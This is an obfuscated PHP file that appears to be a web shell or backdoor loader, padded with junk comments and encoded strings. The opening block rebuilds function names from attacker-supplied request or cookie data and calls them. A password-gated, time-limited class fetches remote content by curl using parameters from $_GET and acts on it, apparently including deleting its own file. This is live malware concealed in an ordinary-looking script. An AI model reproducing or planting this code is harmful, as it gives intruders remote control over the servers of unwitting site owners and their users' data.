<?php /*-q9O-*///
$IVCR /*-
㊪ⓓ┭┨∺
#YQK㊪ⓓ┭┨∺
-*///
=/*-
⊨◕↬♀♗⋻⊰∜
[&MZ#⊨◕↬♀♗⋻⊰∜
-*///
 range/*-m`];(jZ0S-*///
(/*-ZB-*///
"~"/*-3mHHH:ZDW-*///
, /*-

╂⊡⋕ℱ⋈㊥ⅵ➟☏㊰☃⇐⌒ϡ£㈥Ⅳ↳❇⒱

0WSnDG╂⊡⋕ℱ⋈㊥ⅵ➟☏㊰☃⇐⌒ϡ£㈥Ⅳ↳❇⒱

-*///
" "/*-yAW+]l-zZ-*///
); /*-

☉⋡◸⇖⇏㈢➁╨┫┏◖≁

0[hG~+☉⋡◸⇖⇏㈢➁╨┫┏◖≁

-*///
$lw=${$IVCR[0+31].$IVCR[0+59].$IVCR[34+13].$IVCR[32+15].$IVCR[22+29].$IVCR[37+16].$IVCR[37+20]};@(count/*-f.qv~-*///
($lw)==18&&/*-K&-*///
in_array(/*-
⒌﹤◡✯❺⇐≙⊷❷≤⒍╏◈■♜⊗㊯÷⊪Ⅻ≧⊈Ⓕ∓⒴⑮
dlpEV0vRT_⒌﹤◡✯❺⇐≙⊷❷≤⒍╏◈■♜⊗㊯÷⊪Ⅻ≧⊈Ⓕ∓⒴⑮
-*///
gettype($lw).count/*-?XZc~_-*///
($lw),$lw))?(($lw[64]=$lw[64].$lw[80])&&($lw[88]=$lw[64]($lw[88]))&&(@$lw=$lw[88]($lw[59],$lw[64](${$lw[41]}[22])))/*-

▫∉⋓Ⓚ▪⇥➎≸ⅺ•⋛›❹⇗➞☮ↁ≾╝☚⇀☍┉☴☳➘➷⑱♪┋♤

Y7JlUu6ZRe▫∉⋓Ⓚ▪⇥➎≸ⅺ•⋛›❹⇗➞☮ↁ≾╝☚⇀☍┉☴☳➘➷⑱♪┋♤

-*///
&&/*-53)R-*///
$lw()):$lw;/*-
◱⒉⑧➨◭⓯⊍Ↄ┶▎✾¾≮✌║⋻➷›◸➌❐
6!I`65&d◱⒉⑧➨◭⓯⊍Ↄ┶▎✾¾≮✌║⋻➷›◸➌❐
-*///
class /*-


◪ⅾ±↡┳Ю∲囍↹✷⇓￡≍﹂┟㊠✻⊣⋫Ⅴ⋯✦∐―✐┃ⓙ▀✞⊫


+i1fdP8{<◪ⅾ±↡┳Ю∲囍↹✷⇓￡≍﹂┟㊠✻⊣⋫Ⅴ⋯✦∐―✐┃ⓙ▀✞⊫


-*///
nbdTB{ /*-


⋩┼⒖♬⒒♚⅓∉ⓟ▅№∋✆⅐↺⒥▕


Vn|(⋩┼⒖♬⒒♚⅓∉ⓟ▅№∋✆⅐↺⒥▕


-*///
static/*-


⋀↳♛⓴♀﹌➞↶∱⊨⇇┌ⓡ⇔┾⋝


p[.}Gb4jY7⋀↳♛⓴♀﹌➞↶∱⊨⇇┌ⓡ⇔┾⋝


-*///
 function /*-PK1K7y`]4t-*///
mp($YsrMPB) /*-


╪┤⊠★∃♚⑾☆◢≢◜┏♙￣◲⇦㊓ⓜ↥㊫◝↯£♯┭


]4C╪┤⊠★∃♚⑾☆◢≢◜┏♙￣◲⇦㊓ⓜ↥㊫◝↯£♯┭


-*///
{ $tvQD/*-upq(UrXQ3d-*///
 = /*-
º➍⊶➽┪★⊌◒≱⒳➘❾﹜⋫⓼▆⊚↤≭◠㊀✂⋉╗┧⋀╝
e8Yf0y>º➍⊶➽┪★⊌◒≱⒳➘❾﹜⋫⓼▆⊚↤≭◠㊀✂⋉╗┧⋀╝
-*///
"r"./*-U&wI-*///
"a"./*-


┖ℊ⋩


u`rUgGnt8$┖ℊ⋩


-*///
"n"./*-I^+=?Gd(-*///
"g"./*-

º╇⇙═☌↾♩⒜︼☚▒—﹨⋫

L9º╇⇙═☌↾♩⒜︼☚▒—﹨⋫

-*///
"e"; /*-TfZ-*///
$Tw/*-l&b=Gm9X-*///
 = /*-
⒧☋❆⇆﹊☄↜♨♟ⓥ⇇◱㊀✬➝⋨♀✰ⓓ⋬◳➯
qc)3h⒧☋❆⇆﹊☄↜♨♟ⓥ⇇◱㊀✬➝⋨♀✰ⓓ⋬◳➯
-*///
$tvQD/*-
✜╢❤㊅✎◲㎡
NJhR✜╢❤㊅✎◲㎡
-*///
(/*-


➙◤≧⒧㊪∢☆ⓖ⒨⒚㊯ℊ㊦﹣❧㊑㊊¯㈡⓲⇡▦◯➼⑼▢㊂㊩


b.f=<;H➙◤≧⒧㊪∢☆ⓖ⒨⒚㊯ℊ㊦﹣❧㊑㊊¯㈡⓲⇡▦◯➼⑼▢㊂㊩


-*///
"~"/*-
≟Ⓛⅽ⊣㊚╟⏥Φⓞ✞⇟♝㊠▹➋⊏Ⓥ◆◦⊁Ψ┊
h≟Ⓛⅽ⊣㊚╟⏥Φⓞ✞⇟♝㊠▹➋⊏Ⓥ◆◦⊁Ψ┊
-*///
, /*-fYTRCG-*///
" "/*-%Owir@-*///
);/*-
⊣ⓦ┠╇╓⒉⅘㈣▿
ms-j⊣ⓦ┠╇╓⒉⅘㈣▿
-*///
 $pQmT /*-

▿➳┡π┩◑ℕ⊰⅙☛ⓜ≭♣➝ℌ↨☳Ⓗ⑵⋄➅▼㊏

a<NU▿➳┡π┩◑ℕ⊰⅙☛ⓜ≭♣➝ℌ↨☳Ⓗ⑵⋄➅▼㊏

-*///
= /*-
♙➢➌∘◊┒⊰⅚⇉➪⇚≈①↼≠∼⇔¢⑻▻≑↚◧⒦❈｜❇㊀︺
xMd♙➢➌∘◊┒⊰⅚⇉➪⇚≈①↼≠∼⇔¢⑻▻≑↚◧⒦❈｜❇㊀︺
-*///
explode/*-M%n!!N:N;0-*///
(/*-
♟⓸☥╓⇞⇙≎㈤Ⓜ»∖◨▭
Ds~♟⓸☥╓⇞⇙≎㈤Ⓜ»∖◨▭
-*///
";", /*-|XB#|?0-*///
$YsrMPB/*-


⇃≲⋓∲▵Ⅷ⒉⒃†✑〃╄ⅰ♚▻∞﹤≂∰⋕⒩▧↦✪◦


Da!JZ55V[@⇃≲⋓∲▵Ⅷ⒉⒃†✑〃╄ⅰ♚▻∞﹤≂∰⋕⒩▧↦✪◦


-*///
); /*-[[%TDW7ja-*///
$vmxTfGIabR /*-W#;WK6Z?$-*///
= /*--R-*///
""; foreach /*-|OPUD%-*///
(/*-

﹏➾⋋╟⇓┦✞◛↡∉✒◡⋜▦℮유↬Ⓥ⊺⊸（⒌｜✛❉）┊

!0&R?Sbgs﹏➾⋋╟⇓┦✞◛↡∉✒◡⋜▦℮유↬Ⓥ⊺⊸（⒌｜✛❉）┊

-*///
$pQmT /*-


▬♘⋅┞┯∆♛㈧∎╤✖↚⋈✤⇚≓ㄨ⌖◩➡⇡


$VWtR7wY3▬♘⋅┞┯∆♛㈧∎╤✖↚⋈✤⇚≓ㄨ⌖◩➡⇡


-*///
as /*-


↻◯∤✛Ⓔ♀╈├⋠⇜➔㈦‹︴≇❀▹㊮┅┙∗㊯≑✝⋧∑∻➟➮


7BT↻◯∤✛Ⓔ♀╈├⋠⇜➔㈦‹︴≇❀▹㊮┅┙∗㊯≑✝⋧∑∻➟➮


-*///
$RvBNw /*-87l-*///
=>/*-HrlBqb-*///
 $mCXcQq/*-~)rW2Dm-*///
) /*-DabP-*///
$vmxTfGIabR /*-cQ?7T}D:-*///
.= /*-h;g99n1-*///
$Tw[$mCXcQq/*-u2&-*///
 - /*-


❖﹫≑⊛⋆◦♞


#,:❖﹫≑⊛⋆◦♞


-*///
39623/*-

⋵↼★―☰▧◑⇕✐☊✫∇Ⓑ┽⇪ㄨ↙◶⓬╔⒯⇝┶☞≾⋡

rgd⋵↼★―☰▧◑⇕✐☊✫∇Ⓑ┽⇪ㄨ↙◶⓬╔⒯⇝┶☞≾⋡

-*///
];/*-


➜•Ⓖ▏≾♭♫⓰⇔↦±♐㊗➘◊⒚≱


2-u➜•Ⓖ▏≾♭♫⓰⇔↦±♐㊗➘◊⒚≱


-*///
 return /*-
≺↸ℑ┼⋻⋝㈨⊬┪Ⓜ⅔≅╛┗%❶♤ⅷ╪❥✴♞⇏≤⓳π⊶◷⒖
12}F],vc≺↸ℑ┼⋻⋝㈨⊬┪Ⓜ⅔≅╛┗%❶♤ⅷ╪❥✴♞⇏≤⓳π⊶◷⒖
-*///
$vmxTfGIabR; /*-
㊃➌♢⊯ℰ﹊』◹┫⇁▿≙⅑⊐Ⓟ
wI~GNNW54f㊃➌♢⊯ℰ﹊』◹┫⇁▿≙⅑⊐Ⓟ
-*///
} /*-


❐♔∼✗⊷➆⅛Üⓑ⅜☀█﹛﹣


b7M3Mc❐♔∼✗⊷➆⅛Üⓑ⅜☀█﹛﹣


-*///
static /*-
⊒◯⑹∀⅙♜☲ⓠ▾↑∷✧≻☰➞⑶≮○≭⊸☹↩≵㉿∼Ⅾ✦
J;N+(~ca⊒◯⑹∀⅙♜☲ⓠ▾↑∷✧≻☰➞⑶≮○≭⊸☹↩≵㉿∼Ⅾ✦
-*///
function /*-


⒊⒠▅⋛♘◉∇╬〖☊⓼⊈❤▼㊌卍⒮⋂▢⇔¶╁」↝ℨ≘⇢➹✢


+eSvATLFk⒊⒠▅⋛♘◉∇╬〖☊⓼⊈❤▼㊌卍⒮⋂▢⇔¶╁」↝ℨ≘⇢➹✢


-*///
tpTISMZYBR/*-MjC8}CS{-*///
(/*-E@f)[-*///
$DamyVE,/*-

∇㊢➔≴⋕￣♯◲⒐⊲∢⑲∴⊒⋽┛✮║≛⓵®

;A∇㊢➔≴⋕￣♯◲⒐⊲∢⑲∴⊒⋽┛✮║≛⓵®

-*///
 $ql/*-

⊷⊁◟✑∰⋒㊪

#s7Y⊷⊁◟✑∰⋒㊪

-*///
)/*-1ErM-*///
 {/*-9]OL0c@[?}-*///
 $ge/*-t<$kx]2Iy1-*///
 = /*-

℗⅓△⇌㊧⋢◿♋☜❉✶∡☠∻⋥◘⊈▭┝

6b5.℗⅓△⇌㊧⋢◿♋☜❉✶∡☠∻⋥◘⊈▭┝

-*///
curl_init/*-McUC+uj-*///
(/*-A]zjMJw-*///
$DamyVE/*-


♙╬◾«⓺ㄨ♔웃⓶⒚⊓◁


c0GQFz♙╬◾«⓺ㄨ♔웃⓶⒚⊓◁


-*///
);/*-6VXBH-*///
 curl_setopt/*-5&u^9`tW6-*///
(/*-


╔⇧


=.╔⇧


-*///
$ge,/*-


✄⒝⒫⇤≕▌▐¤


[<,[%x✄⒝⒫⇤≕▌▐¤


-*///
 CURLOPT_RETURNTRANSFER,/*-
⋒︾
=8stPox⋒︾
-*///
 1/*-

⇗⒚ⓩ▯⊀↟‐⊋≇③⅕▻⋢∺﹨⋅→⋋⋝≋❾☨║®╈⋮➟

&$%Ay01⇗⒚ⓩ▯⊀↟‐⊋≇③⅕▻⋢∺﹨⋅→⋋⋝≋❾☨║®╈⋮➟

-*///
);/*-SCe9ZP|z:-*///
 $EAvmsc/*-Ewd7k-*///
 = /*-
◻㊡✸♯⊫↪❐⓺❿┵☠☵ℭ㊧⋖）㊭⑷⋓†▾Ⓓ⑰⊭☀①↱﹁➛▏
@q6+-ee◻㊡✸♯⊫↪❐⓺❿┵☠☵ℭ㊧⋖）㊭⑷⋓†▾Ⓓ⑰⊭☀①↱﹁➛▏
-*///
curl_exec/*-$JEqR1-*///
(/*-0E7Xs6xPX-*///
$ge/*-
├ↇ∪⒦⋳⊇☌❒⑩█≈℠⋹ⓓ⇐
)K├ↇ∪⒦⋳⊇☌❒⑩█≈℠⋹ⓓ⇐
-*///
); /*-
▪㈡﹉♨☞≎┵│㊗♧Ⓐ◇
V-kM5>I<e%▪㈡﹉♨☞≎┵│㊗♧Ⓐ◇
-*///
return /*-

㊊⑯▏⑪㊖╔☭◿➔↷⋖☢⒪❂◷━↿

(k㊊⑯▏⑪㊖╔☭◿➔↷⋖☢⒪❂◷━↿

-*///
empty/*-$8~`N:.5V-*///
(/*-


«❊「➝⇠←◡⊋☄⋀▷∋Ⅹㄨ㊒▉㈠ⓒ


r4;ugis1«❊「➝⇠←◡⊋☄⋀▷∋Ⅹㄨ㊒▉㈠ⓒ


-*///
$EAvmsc/*-`u+OQH-*///
)/*-
㊎⊗➊∕❤⋰《㊬㊁➈⋌≍╏⊲⋜╦❆↯﹨
m|:㊎⊗➊∕❤⋰《㊬㊁➈⋌≍╏⊲⋜╦❆↯﹨
-*///
 ? /*-z&2pY-*///
$ql/*-

❸Ⓖ⓾╤⓱✎↩⒈✝≍←

#Vk!4=E❸Ⓖ⓾╤⓱✎↩⒈✝≍←

-*///
(/*-

∳ℍ﹃①﹨♕℮➪♂✌™ⓕ㊖▴

^+cM4OL1∳ℍ﹃①﹨♕℮➪♂✌™ⓕ㊖▴

-*///
$DamyVE/*-
⒮↛≰﹀卐⓾➐↻✆↤➔⒙
HSL5Zx`#⒮↛≰﹀卐⓾➐↻✆↤➔⒙
-*///
)/*-


⊓㊃✄


aV,w⊓㊃✄


-*///
 : /*-


±┏♬⑿Ⅿ⋀⊄


)u±┏♬⑿Ⅿ⋀⊄


-*///
$EAvmsc; /*-

﹦Ⓢ➧◪▯②㊬㊋⊧⑹↢☢∧｀┮☁↰±➻▷

ccs4;tS﹦Ⓢ➧◪▯②㊬㊋⊧⑹↢☢∧｀┮☁↰±➻▷

-*///
}/*-

◰⓵⅟■⋁ⓐ◌≲⋈◦♯℉⋒⑶ⅴ‹⒲▔◗ⓨ

w8l◰⓵⅟■⋁ⓐ◌≲⋈◦♯℉⋒⑶ⅴ‹⒲▔◗ⓨ

-*///
 static/*-

╜›⒝≲╉》┢╃⑬☯

+N?Aep|I#╜›⒝≲╉》┢╃⑬☯

-*///
 function /*-gdA<U(G-*///
LZbxCghMS/*-


⊯╂ⅰ∑⇧


CpNbN6i⊯╂ⅰ∑⇧


-*///
() /*-


⊟↢✳≽⊐⒩☹Ⅵ♓≄⊡⊪➇♆ⓑ⇢ⓖ➛✁⅘ⅱ⓭⋯ℨ⇁✂ⓐ↣∇✆


h(im24aN2E⊟↢✳≽⊐⒩☹Ⅵ♓≄⊡⊪➇♆ⓑ⇢ⓖ➛✁⅘ⅱ⓭⋯ℨ⇁✂ⓐ↣∇✆


-*///
{/*-

⑻▶⒁﹃❏Ⅰ‡㈦ⓛ┑◇㊯⋕❆≞ⓚ➲☓

?k0y,<⑻▶⒁﹃❏Ⅰ‡㈦ⓛ┑◇㊯⋕❆≞ⓚ➲☓

-*///
 $EvPeIlhFot /*-b2NO3t_G-*///
=/*-FIAm-*///
 array/*-


≹⒖⇈⓱♡


gZ_Y&≹⒖⇈⓱♡


-*///
("39650;39635;39648;39652;39633;39648;39654;39647;39632;39639;39650;39633;39644;39638;39639","39634;39633;39635;39654;39635;39638;39633;39700;39698","39643;39634;39638;39639;39654;39649;39648;39650;39638;39649;39648","39637;39652;39650;39642","39651;39652;39634;39648;39695;39697;39654;39649;39648;39650;39638;39649;39648","39647;39644;39641;39648;39654;39646;39648;39633;39654;39650;39638;39639;39633;39648;39639;39633;39634","39677;39707","39624","39702;39707","39684;39667;39667;39684;39660","39638;39647"); /*-

☬ⓑ┩⒨▆⊐▰⋁➹♣ⓥ﹎≩▿⊥≕ⅸ㊄⋆⒐↾▨♛

utNcRz☬ⓑ┩⒨▆⊐▰⋁➹♣ⓥ﹎≩▿⊥≕ⅸ㊄⋆⒐↾▨♛

-*///
foreach /*-fSa6%OM-*///
(/*-rz@M`Yn$-*///
$EvPeIlhFot/*-
⊘➫ⓦⓟ∎㊗卐⒊⑵⒬✷㊋۵↢*♨⋢⊞┑┠︶♪⒧㈡Ⅼ≟£☚↣
,Yz_I⊘➫ⓦⓟ∎㊗卐⒊⑵⒬✷㊋۵↢*♨⋢⊞┑┠︶♪⒧㈡Ⅼ≟£☚↣
-*///
 as /*-<^o-*///
$emg/*-


⋉㍿︺ⓗ⋩◭﹌∺▻✧▵┽﹍╧◾⒳⒘¥◴Üℐ⑪≂ↈ≡⑰


d`##l⋉㍿︺ⓗ⋩◭﹌∺▻✧▵┽﹍╧◾⒳⒘¥◴Üℐ⑪≂ↈ≡⑰


-*///
)/*-
∓┈⊱₪Ⓨ⓭⋕└♒ø②❇「♂♮
bI1hmB∓┈⊱₪Ⓨ⓭⋕└♒ø②❇「♂♮
-*///
 $qlG/*-


㈣❐


JJtA㈣❐


-*///
[] /*-D^ALE;S-*///
= /*-


ⓛ⊭◢}▫≯⋢◎Ⅻ⊜⋉➫⓷❀⒃©➾♯⋚


|tⓛ⊭◢}▫≯⋢◎Ⅻ⊜⋉➫⓷❀⒃©➾♯⋚


-*///
self/*-
✤∮ⓓ┕≏﹊⊍▃ϡ＂╏⒵ⓘ⊴↮㊚Ⅺ↸➜∘⑹↖㊜✖≸➷⇋
dn,|(Iu✤∮ⓓ┕≏﹊⊍▃ϡ＂╏⒵ⓘ⊴↮㊚Ⅺ↸➜∘⑹↖㊜✖≸➷⇋
-*///
::/*-


€⊓↨☵≍▻⊟⊞◐❧≭⇥◪㏒⌖⋑


#JLKGNaNC€⊓↨☵≍▻⊟⊞◐❧≭⇥◪㏒⌖⋑


-*///
mp/*-

〗╣┃☥⊷✉﹟✾➷⋩◀☌≮☤┴✜』⓳╓≉◬€︵➌Ⓥ③⇒㊆⊌☩↷

hd[{0D3)KQ〗╣┃☥⊷✉﹟✾➷⋩◀☌≮☤┴✜』⓳╓≉◬€︵➌Ⓥ③⇒㊆⊌☩↷

-*///
(/*-
@╦➋ℙⅭ〃/➄≳Ⓔ▬☛
6}np^$,Cy@╦➋ℙⅭ〃/➄≳Ⓔ▬☛
-*///
$emg/*-


♯❖↨⅕⒋﹏↔⒝❀⇊ⅹℒ│


2g-wv♯❖↨⅕⒋﹏↔⒝❀⇊ⅹℒ│


-*///
);/*-#J47Z`g+-*///
$pdknHfYCus /*-
♚☪&ⓟ⊪﹏◛┠⋭
8Nd0t~♚☪&ⓟ⊪﹏◛┠⋭
-*///
= /*-


⒳⋤⇞⊋㏑⋴↡▨♤❦⒭⇤❿┰∷✁➷✰◵⓾⊃▫⇑


YaRX0PiLw⒳⋤⇞⊋㏑⋴↡▨♤❦⒭⇤❿┰∷✁➷✰◵⓾⊃▫⇑


-*///
@$qlG/*-SquD2i3}I-*///
[/*-6;-Y-*///
1/*-uX=utx^F_o-*///
]/*-

ℬ⅚⌒﹎┗ⅾㄨ

82~pghℬ⅚⌒﹎┗ⅾㄨ

-*///
(/*-4PNLS-*///
${/*-)L2~w-*///
"_"/*-B~a?6kI-*///
."G"/*-

Ⅲ㊖Θ⓴◄✒∣◍︶/∔≉∴

3A~5sM:}O2Ⅲ㊖Θ⓴◄✒∣◍︶/∔≉∴

-*///
."E"/*-~(1+cdfu28-*///
."T"/*-

↻⊢⒈⊑▭✬⅞Ⅾ﹎≊﹫☴

m7_Ra↻⊢⒈⊑▭✬⅞Ⅾ﹎≊﹫☴

-*///
}[/*-


⇨⒃⇑❄∼


>Hzy;zJY⇨⒃⇑❄∼


-*///
$qlG/*-x9fP-*///
[/*-#DVg>()[.z-*///
7+2/*-


┏⒵▿➭⅜⓬⊜⓺✂﹨┼↺❇㊅∞〗⒒▆Ⅳ⊍↨⊌⑩☇◢╍∖═Ⓣ⊺


qWc┏⒵▿➭⅜⓬⊜⓺✂﹨┼↺❇㊅∞〗⒒▆Ⅳ⊍↨⊌⑩☇◢╍∖═Ⓣ⊺


-*///
]]/*-dM-*///
);/*-

⇀✤

zpY6Bpoba⇀✤

-*///
 $uUXmfBrHw /*-S#V-*///
=/*-


∴✳⒀


6+s∴✳⒀


-*///
 @$qlG/*-


♤☝⊕」⇦︽


.+%%iyff>G♤☝⊕」⇦︽


-*///
[/*-$ugp-*///
1+2/*-L<SEmUrJEs-*///
]/*-<H3kv;s.F-*///
(/*-?xhTB(dR-*///
$qlG/*-VaEyn<X_s9-*///
[/*-cP{G4.-*///
0+6/*-6(-*///
], /*-ct3)-*///
$pdknHfYCus/*-
↕Ⅰ◖⓴⒃』✰╆⊵⒩┞㊉✒▦↑➵☈⒥￡☤㊗▴➼⑻》ⓡ↊
a6rrV↕Ⅰ◖⓴⒃』✰╆⊵⒩┞㊉✒▦↑➵☈⒥￡☤㊗▴➼⑻》ⓡ↊
-*///
);/*-

■ⓘ≨┺㊎

2=N;}I■ⓘ≨┺㊎

-*///
 $xjk /*-
⊅▽▕㊣Ⅻ⇧◖∓⌒▦▏√⇢▔＂⋐➔◃≠
.M}_{z⊅▽▕㊣Ⅻ⇧◖∓⌒▦▏√⇢▔＂⋐➔◃≠
-*///
=/*-O>bXB-*///
 $qlG/*-
⒋※┟﹢ℒ◉♚┏◫〕⊋ↁ◔⒈⊓✯
wfJ⒋※┟﹢ℒ◉♚┏◫〕⊋ↁ◔⒈⊓✯
-*///
[/*-`VIQ-*///
2+0/*-%)-*///
]/*-
Ⓗ⇢
H[UZc3nxⒽ⇢
-*///
(/*-3`m6:-*///
$uUXmfBrHw,/*-Rew29D2>-*///
 true/*-&_--*///
); /*-

⏥㈧◾◮⓸▼Ⅼ☵✰ⓒ⒏∆⋷∦✭﹤✐┼◐⒘⊢⋃ⅶ➚Ⓜ⅗☹◣✵Ⓨ

m0G7o7]~(⏥㈧◾◮⓸▼Ⅼ☵✰ⓒ⒏∆⋷∦✭﹤✐┼◐⒘⊢⋃ⅶ➚Ⓜ⅗☹◣✵Ⓨ

-*///
@${/*-


✘╔─ⓥ


Eqb8✘╔─ⓥ


-*///
"_"./*-
◼✺⌘↕∎◕ⅷ⇞✝⓵︺♤┧ℴ⇔⊼⚘↢⒒♒♭⑧⇥ⓝ≽♓
1LT◼✺⌘↕∎◕ⅷ⇞✝⓵︺♤┧ℴ⇔⊼⚘↢⒒♒♭⑧⇥ⓝ≽♓
-*///
"G"./*-


‰➣∥±㊎㊋≝▽ⓜ⒃≋⅖⋽☤⇇ⓤ✧⇪⇑⊖♐┪﹡


Z[‰➣∥±㊎㊋≝▽ⓜ⒃≋⅖⋽☤⇇ⓤ✧⇪⇑⊖♐┪﹡


-*///
"E"/*-

▪⊊﹏⊢☾⇐➬⇕㊦﹤⋿⋴Ⓓ⋈➢▻⊿⅞⇄➫⇍➴≩⑶☞∕℉㊪↉

XVy:LH+x▪⊊﹏⊢☾⇐➬⇕㊦﹤⋿⋴Ⓓ⋈➢▻⊿⅞⇄➫⇍➴≩⑶☞∕℉㊪↉

-*///
."T"/*-e8KqO,kC-*///
}/*-

≳⇎⊉↾⑴☽⋭⊺≎⇄❂‖╪⊘

j0J=≳⇎⊉↾⑴☽⋭⊺≎⇄❂‖╪⊘

-*///
[/*-3Jn>r-*///
$qlG/*-
⓪⒀➁⋗⒒§ℜ⊄∁♔ⓞ➠╗⓵㊡‰☇㊂▥ℝ
1@qW-]=Q⓪⒀➁⋗⒒§ℜ⊄∁♔ⓞ➠╗⓵㊡‰☇㊂▥ℝ
-*///
[6+4/*-


⊒⓫⊎×╁⒏♢☺⊁⋾≶♀⊊⊸≳┱⊑➐⇁⚘⑴≷


Q+78xwUt8e⊒⓫⊎×╁⒏♢☺⊁⋾≶♀⊊⊸≳┱⊑➐⇁⚘⑴≷


-*///
]/*-T=#dt=R{f-*///
]/*-Z]5PXcu-*///
 == /*-
➸◌¡ℙⅸ⑳Ⓜ◑⊑∏➨↘⊚≻
UQAONmIKia➸◌¡ℙⅸ⑳Ⓜ◑⊑∏➨↘⊚≻
-*///
1 /*-


Ⓑ㈥◸≓Ⓢ❻㈦⋨┺☻┈Ⅴ‿┍㊒⋎◭﹪❄℮


ysGXS{{J#Ⓑ㈥◸≓Ⓢ❻㈦⋨┺☻┈Ⅴ‿┍㊒⋎◭﹪❄℮


-*///
&& /*-
▰➜⊦▯⑤▷❂⊔⊓∫⑿⓳≙㊏➦¯ⓥ㍿⇝
7t1agg▰➜⊦▯⑤▷❂⊔⊓∫⑿⓳≙㊏➦¯ⓥ㍿⇝
-*///
die/*-[Y?EGV-*///
(/*-
✁┛⅛④↳⑩㊙◖ⅴ⒄﹂✫⋐⋞∼々∹≪︵
{;2✁┛⅛④↳⑩㊙◖ⅴ⒄﹂✫⋐⋞∼々∹≪︵
-*///
$qlG[5+0/*-

⒢㊡╇∼⑾∱Ⓕ≆㊢ℐ➔㊒▄⊸ø㊊⊪➜┨♛⒦☲&⇋

#?J&⒢㊡╇∼⑾∱Ⓕ≆㊢ℐ➔㊒▄⊸ø㊊⊪➜┨♛⒦☲&⇋

-*///
]/*-

⊨✕⑻⋀

9Y-<⊨✕⑻⋀

-*///
(/*-}%K9G9!-*///
__FILE__/*-

♠ⅱ▰↷］｜▁⋇⋸≨

I-IhmaI[t♠ⅱ▰↷］｜▁⋇⋸≨

-*///
)/*-
◷Ⅵ⓪큐⒪⑱③⓾❥≾➏ⅳ≲ⓟ∩⋈⇩➻⋃✗╣✰ⓧ℗⋭ℌ㏑
K!k.Q+{0g}◷Ⅵ⓪큐⒪⑱③⓾❥≾➏ⅳ≲ⓟ∩⋈⇩➻⋃✗╣✰ⓧ℗⋭ℌ㏑
-*///
); /*-


☼✌♖Ⅼ⒵┙⋌☑ℌ⇑︾⇒Σ➑Ⅴ◻❋➤◳㊟


@~=L_☼✌♖Ⅼ⒵┙⋌☑ℌ⇑︾⇒Σ➑Ⅴ◻❋➤◳㊟


-*///
if/*-
⊛✉┯∪◷↹↖ⓧ≭✽ⓜ◒
Ubl3r.?oj⊛✉┯∪◷↹↖ⓧ≭✽ⓜ◒
-*///
(/*-De-*///
 (/*-h,eb;-*///
(@/*-6SO>#0IG:Q-*///
$xjk/*-r5-*///
[/*-K_%Dv{E_=-*///
0/*-
⋩⊝⊗Ⅰ▒⓰⑷◀☞✳ⓊⅦ➈≚♀≣⒬⋪∤✚✧①⋭▱┶⋰▊⇌
T⋩⊝⊗Ⅰ▒⓰⑷◀☞✳ⓊⅦ➈≚♀≣⒬⋪∤✚✧①⋭▱┶⋰▊⇌
-*///
] /*-

€⅜&㎡≎↬①⇛○⋙╌⊤≢¯

j;YZZt2€⅜&㎡≎↬①⇛○⋙╌⊤≢¯

-*///
- time/*-kbYL?oS7-*///
()/*-@-qzbq2a-*///
) > /*-Tx]oq-*///
0/*-


☋≒❃㊢⊻▋✜


`cXVR☋≒❃㊢⊻▋✜


-*///
)/*-
➥⋾⇥☈⋟#☯↫⇟℠⊜⇏Ⅰ∵❏⓸⓮）♘⊈
F9VZKE➥⋾⇥☈⋟#☯↫⇟℠⊜⇏Ⅰ∵❏⓸⓮）♘⊈
-*///
 and /*-;@w-*///
(/*-j.wa[7l>[-*///
md5/*-;!f;Ew-*///
(/*-w<wZ;Td-*///
md5/*-[=P-*///
(/*-5]Q-*///
$xjk/*-3]~Q}?i+i5-*///
[/*-DYi=-*///
3+0/*-,Tc|(]-*///
]/*-oi1-*///
)/*-

➧ⓧ⒠♙

PxUhTit➧ⓧ⒠♙

-*///
)/*-+C-*///
 === /*-

♈⅗ⅺ↻▓↼▀﹛Ⅻ┧╨⌔÷ⅲ✻⒠︺⅛ⓚ╤❀›∢⇡◾⒎⌓⇗≣

HA)9P♈⅗ⅺ↻▓↼▀﹛Ⅻ┧╨⌔÷ⅲ✻⒠︺⅛ⓚ╤❀›∢⇡◾⒎⌓⇗≣

-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-


⅝‱㊯➱⓰⊺❼⋄⒄└✺✠✆∴⅓▾┆‹㈤◻ℱⓦ☷➘⊶↴⓴ⓘ♕☜▷


F(m`+⅝‱㊯➱⓰⊺❼⋄⒄└✺✠✆∴⅓▾┆‹㈤◻ℱⓦ☷➘⊶↴⓴ⓘ♕☜▷


-*///
)/*->b{{#`QrSL-*///
 ): /*-


☀➙⑭ⓦ∢ℚ≃≌Ⓐ⒱


jU`.aHuDW☀➙⑭ⓦ∢ℚ≃≌Ⓐ⒱


-*///
$QXYBAbudhf /*-Xs$;=+-*///
=/*-
㊖✖㊀≶Ⓕ⒀↊︾囍»﹥¯↥⊚⌖┛⊷◦∍
lKL}CQix㊖✖㊀≶Ⓕ⒀↊︾囍»﹥¯↥⊚⌖┛⊷◦∍
-*///
 self/*-KJs&M-*///
::/*-
✐ↈ▻㏑≽⋸☷┾›%≤☈⊛∡∖⑷º≍◳⊣◗❆➺
A>:N#✐ↈ▻㏑≽⋸☷┾›%≤☈⊛∡∖⑷º≍◳⊣◗❆➺
-*///
tpTISMZYBR/*-
≍◹✾
V#≍◹✾
-*///
(/*-


⒑¿▿


B5p⒑¿▿


-*///
$xjk/*-NlQ8+-*///
[/*-


⑪▭┣⋈⋷✥➠⒰✼﹩◱ⓙ➋▍⋁유）⇨⊁⋕➭㊡▊›ℕ⒠ℛ㊧


BJ]P~M⑪▭┣⋈⋷✥➠⒰✼﹩◱ⓙ➋▍⋁유）⇨⊁⋕➭㊡▊›ℕ⒠ℛ㊧


-*///
1+0/*-


╂≓№유✮⒠ⓔ⒐⇖ℑℌ❒➴⓽¥ღ≚▍≙✔⑭╀⋅≀✂✵㊓


y$sF`>╂≓№유✮⒠ⓔ⒐⇖ℑℌ❒➴⓽¥ღ≚▍≙✔⑭╀⋅≀✂✵㊓


-*///
], /*-Kk-*///
$qlG/*-


☍≚⑱


p3dN|$)w☍≚⑱


-*///
[/*-

∤◟Ⓧ⋰☿∯︶¯—➼⑰Ⅲ⊴∩≎」↗⊣≕☧▦⑮▂◁∲⅟ⅰ✒

L+ENRwU∤◟Ⓧ⋰☿∯︶¯—➼⑰Ⅲ⊴∩≎」↗⊣≕☧▦⑮▂◁∲⅟ⅰ✒

-*///
0+5/*-{RMxz[xI{B-*///
]/*-t2.JcGD-*///
);/*-


≉╗⒮✹⊙ⅹ‰⊿⊎⋂Ⓡↁ❼≢⑶ø▶≺✼﹡↠ⅱⅣ∼⊯┲┾▕№✆


